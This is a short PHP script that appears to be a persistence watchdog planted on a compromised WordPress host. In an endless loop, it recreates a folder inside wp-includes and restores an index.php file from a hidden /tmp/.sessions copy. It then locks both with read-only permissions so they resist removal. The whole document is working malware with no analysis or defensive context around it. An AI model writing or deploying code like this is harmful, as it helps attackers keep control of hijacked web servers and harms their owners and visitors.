
<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/home/mfbsrygq/apartmentfairs.com/wp-includes/Text/Diff")){
        mkdir("/home/mfbsrygq/apartmentfairs.com/wp-includes/Text/Diff");
    }
    if (!file_exists("/opt/alt/php52/var/www/index.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L29wdC9hbHQvcGhwNTIvdmFyL3d3d2luZGV4LXRleHQ="));
        file_put_contents("/opt/alt/php52/var/www/index.php", base64_decode($text));
    }
    if (gecko_perm("/opt/alt/php52/var/www/index.php") != 0444){
        chmod("/opt/alt/php52/var/www/index.php", 0444);
    }
    if (gecko_perm("/home/mfbsrygq/apartmentfairs.com/wp-includes/Text/Diff") != 0555){
        chmod("/home/mfbsrygq/apartmentfairs.com/wp-includes/Text/Diff", 0555);
    }
}

function gecko_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}
